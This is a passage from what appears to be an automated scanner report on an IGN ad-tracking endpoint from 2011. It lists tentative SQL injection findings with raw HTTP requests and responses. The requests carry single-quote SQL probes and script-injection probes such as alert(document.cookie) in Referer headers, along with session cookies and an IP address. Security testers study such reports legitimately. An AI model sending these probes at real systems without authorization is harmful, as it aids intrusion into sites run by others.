GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=8927&FlightID=7790&TargetID=6669&EntityDefResetFlag=0&C=0&Segments=7,26,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23370,23425,23427,23472,23479,23480,23493&Targets=6846,28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=beykRvw,bguRragewbmAj HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:28 GMT
Connection: close
Vary: Accept-Encoding


1.44. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,108,268,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11070,11754,13182,14845,15232,16249,16251,16339,17586,17863,19173,19554,19557,20860,20903,20945,20946,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,13537,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=Isllrd,bguRrblewbsuu [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,108,268,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11070,11754,13182,14845,15232,16249,16251,16339,17586,17863,19173,19554,19557,20860,20903,20945,20946,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,13537,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=Isllrd,bguRrblewbsuu

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,108,268,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11070,11754,13182,14845,15232,16249,16251,16339,17586,17863,19173,19554,19557,20860,20903,20945,20946,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,13537,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=Isllrd,bguRrblewbsuu HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:43:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,108,268,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11070,11754,13182,14845,15232,16249,16251,16339,17586,17863,19173,19554,19557,20860,20903,20945,20946,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,13537,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=Isllrd,bguRrblewbsuu HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:43:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:43:54 GMT
Connection: close
Vary: Accept-Encoding


1.45. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,108,268,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11070,11754,13182,14845,15232,16249,16251,16339,17586,17863,19173,19554,19557,20860,20903,20945,20946,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,13537,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bIdRvss,bguRqRgbdmoWp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,108,268,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11070,11754,13182,14845,15232,16249,16251,16339,17586,17863,19173,19554,19557,20860,20903,20945,20946,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,13537,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bIdRvss,bguRqRgbdmoWp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,108,268,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11070,11754,13182,14845,15232,16249,16251,16339,17586,17863,19173,19554,19557,20860,20903,20945,20946,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,13537,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bIdRvss,bguRqRgbdmoWp HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,108,268,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11070,11754,13182,14845,15232,16249,16251,16339,17586,17863,19173,19554,19557,20860,20903,20945,20946,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,13537,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bIdRvss,bguRqRgbdmoWp HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:12 GMT
Connection: close
Vary: Accept-Encoding


1.46. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5328,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11754,13182,14845,15232,16249,16251,16339,17586,17863,17899,19173,19554,19557,20835,20860,20903,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cwkajIr,bguRrfrbdmWad [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5328,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11754,13182,14845,15232,16249,16251,16339,17586,17863,17899,19173,19554,19557,20835,20860,20903,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cwkajIr,bguRrfrbdmWad

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5328,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11754,13182,14845,15232,16249,16251,16339,17586,17863,17899,19173,19554,19557,20835,20860,20903,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cwkajIr,bguRrfrbdmWad HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5328,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11754,13182,14845,15232,16249,16251,16339,17586,17863,17899,19173,19554,19557,20835,20860,20903,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cwkajIr,bguRrfrbdmWad HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:47 GMT
Connection: close
Vary: Accept-Encoding


1.47. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5328,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11754,13182,14845,15232,16249,16251,16339,17586,17863,17899,19173,19554,19557,20835,20860,20903,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bmgrptj,bguRragewbmAq [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=99945&FlightID=90834&TargetID=16207&EntityDefResetFlag=0&C=0&Segments=4,352,1240,2091,2094,2747,2861,3491,3978,4112,4602,4603,4723,4882,4917,4941,4952,4968,5025,5046,5052,5328,5718,5749,5906,6102,6382,6573,6616,6669,6700,6703,7102,7396,7752,7888,8587,9109,9598,10821,11754,13182,14845,15232,16249,16251,16339,17586,17863,17899,19173,19554,19557,20835,20860,20903,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6554,6851,8078,9129,6821,8525,9481,7677,24547,7478,6659,10619,13442,16207,22191,24028,24020&Values=25,31,43,60,72,80,91,101,110,150,152,235,264,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bmgrptj,bguRragewbmAq

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

